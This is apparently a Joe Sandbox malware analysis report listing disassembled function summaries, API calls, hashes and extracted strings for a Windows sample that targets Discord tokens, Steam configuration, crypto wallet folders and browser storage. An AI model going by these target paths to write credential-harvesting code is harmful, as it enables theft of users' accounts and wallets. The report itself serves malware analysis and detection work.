                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E3159719003099FCF00EFA5C9819EEBBB5BF48314F40445EF916A7251DB38A985CFA8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 309549813-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                      • Instruction ID: b65bf78c018c26f30e4a94ab22d84a19a40ae7d672281f86a08f23e214b62c4f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41B1312143409FD314EF61D895BDEB3E9ABC8304F40481EF48A97291DBBCAD89CB66
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 00411BAD
                                                                                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,75918B60,?,?,004144A8), ref: 00411BC8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,75918B60,?), ref: 00411BD6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                      • Instruction ID: ca78cda8c920ae7da25bbd8c375dff46666a8013e4c9ac76a8aa62fa3564fd1b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B50184729096148BC300EF7CD94559EBBF0BB85725F014729ED94D7260E730AA99CBD3
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                      • Instruction ID: 17c2f96a6e384425bd33d4ac7292e407ff3d1e4c2ad55af778a65a8cd36ca61f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77E092B13002107BD7206769AC4AFEB3A69AB85B55F040419F785CB2C0CAB598C083E2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
Yara matches
Similarity
• API ID: FolderPathlstrcpy
• String ID:
• API String ID: 1699248803-0
• Opcode ID: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
• Instruction ID: 15d096accc25870f1c61d4fec85a6e9edf64df49f5c63818c5a2d69bf229bf11
• Opcode Fuzzy Hash: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
• Instruction Fuzzy Hash: CAF030756443406BD2209B18DC85B6BB7A9EFC4755F00882DF68957381C6349C1586A6
APIs
• GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
Memory Dump Source
• Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
• Instruction ID: fe820049153354b6effd4291471353984c4611ada376a903b3c10ac4968f751e
• Opcode Fuzzy Hash: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
• Instruction Fuzzy Hash: 87D0A7773013225F4B006AEA2C948CF530DEBC0358741042FF50097100CA686D4B86F9
APIs
• LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
Memory Dump Source
• Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
Yara matches
Similarity
• API ID: AllocLocal
• String ID:
• API String ID: 3494564517-0
• Opcode ID: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
• Instruction ID: ab5a9e63b36d8a4e180a9fb52d0f1ced6ce58d3d562b5a6390f3396a209e36a0
• Opcode Fuzzy Hash: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
• Instruction Fuzzy Hash: 88219E31608A520FC73A4F3945D0BB6B752AF97245B0DC37FDA4507777DA2A48C54264
APIs
• GetProcessHeap.KERNEL32 ref: 00415715
• HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
• wsprintfA.USER32 ref: 00415739
• FindFirstFileA.KERNEL32(?,?), ref: 0041574A
  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
• strlen.MSVCRT ref: 004157D3
• memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
• strlen.MSVCRT ref: 0041586B
• memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0041589C
• ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 004158FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heapmemcmpstrlen$??3@AllocFileFindFirstProcessmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$5]A$C:\ProgramData\$Soft$\Discord\tokens.txt$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                      • API String ID: 2833195460-599946814
                                                                                                                                                                                                                                                                                      • Opcode ID: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                      • Instruction ID: 81ee40a3975c9a922aef849e5e8a3abd7cc697fd74e0cd7b6c267da97902711e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4502D571900618ABCB10EBB1CD85AEEB779BF48304F44015EF606A7151DB7CBAC5CBA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040BC5A
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040BC6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BCFE
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040BD2F
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BD8B
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BDBC
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BE1F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\*.*$.metadata-v2$C:\ProgramData\$PSk?$Plugins$Ph=$Wallets$W<?$\storage\default\$%@$+Q$N=$P>$V=$X>$]=$_>$d=$x>
                                                                                                                                                                                                                                                                                      • API String ID: 3353021899-1404224526
                                                                                                                                                                                                                                                                                      • Opcode ID: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                      • Instruction ID: db501d22f0f1181e2ce2af52b6c83326310b215b830042a06cc2d5eef77a8b05
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86425231A102189BDF04EBA1C9D59FE7769AF44308F4040AEF9066B192DF7CADC5C7A9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041DDB9
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 0041DECA
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 0041DEE8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandlelstrcpy
                                                                                                                                                                                                                                                                                      • String ID: UT
                                                                                                                                                                                                                                                                                      • API String ID: 3205445448-894488996
                                                                                                                                                                                                                                                                                      • Opcode ID: 440306b1dfb058b7a087819529ee374811c9941dc63fc46d873302e09528c2b2
                                                                                                                                                                                                                                                                                      • Instruction ID: ac4f865b8f17060690429e4fd138a7650e313cba3034da994fc339625156bd58
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 440306b1dfb058b7a087819529ee374811c9941dc63fc46d873302e09528c2b2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C12D2B5A087809FD721DF26C48479BBBE1AF95308F14482EE8C687352D738D985CB5A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 00414DFD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$Soft$Software\Valve\Steam$SteamPath$\Steam\$\config\
                                                                                                                                                                                                                                                                                      • API String ID: 3353021899-493467598
                                                                                                                                                                                                                                                                                      • Opcode ID: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                      • Instruction ID: f04b4360dc0817d558250c3cdd1667f1ca9511f4c4837c2270bb77207d21b6f3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1132B531C007589BDF10EF65CD85AEDB778BF58304F00929AF90967152EB78AAC5CB94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFindstrcpy$strlenwsprintf$CloseFirstFolderNextOperationPath_splitpathisupper
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                                                      • API String ID: 3519957579-2663966076
                                                                                                                                                                                                                                                                                      • Opcode ID: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                      • Instruction ID: 114bed65e9d4b9d73eb4094e4860af952423d6fe10318c0fdbdbb5acdc2bd80f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8413B71908348AFD2209B21DC05BEB77BCAFD5304F04452EF99982251E779A689C7AB
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3457131274-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                      • Instruction ID: 75c582a46244fff173573742a7ab3bbcd042cdd94e8295cbfc9d5a78f2bf368e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A03107F1A0474ABFD354DF25ED84AA7B7A8FB45308F44412AE84483B41E338F965CBA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411F2F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                      • Instruction ID: 12a5467778ca0c5a55c84e6a3ebf7af38e155dcebc9527c53f9d4ce48d6bebb5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33F06D312052156BE3201B22EC08FABBBECEF86795F04142DF549D6260DB289852C7B5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041D88A
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D894
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D8AF
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D914
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                      • Instruction ID: 853963dc4ef663bce705e73e50dc6f04fde9a019ac164f808202a007976d34a8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A2100B28147109AE305CF29C8557B7BBE4FF94384F004A2EF0C29A252EB75D086D761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?,7591F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                      • Instruction ID: 1e243eb0cc245641358f316f4ded0038930a38816da4ddb4eced82cb662ad228
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E04F363013149BC6208B89ECC5D57BBAAEB8D7F4B5A4172EA045B326D275AC50CA64
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                      • Instruction ID: 81a96ac3c5c45741fb44ce0365675c3fdd34da691af61be43d7ddf4b7eb2458a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59224CB57062998FCB35CF99C9805E9B7A2BF8A310F14852EDC4D8B351C734AA47DB42
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                      • Instruction ID: 0d88d1c80d5cf604edfe207e3e975c6923d32c25b21c0e4bf53f94e4bddbbc5c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55E18DB1B06A56ABC30A9F79C4805E5F7A5FF4A309B04832EE86C53242D7347467CBC6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                      • Instruction ID: 4cfa1d93c302992564cd6e5d5855d4dbd855d3a9678cd46773ae9a1c723c4c6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AD1F975A253118BDB02DFB8C8C05D577A6AF96341B08C37EEC487F20BE738A4428B56
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                      • Instruction ID: eb1f8b5bbe8e890cce5985e8088739ae93b1079bd2bcff990eab828ac5c7b9b1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A431C330D740B049C7809F39C8949E77BE2DB8B206FAD86A7D5D147583D319C64BEB25
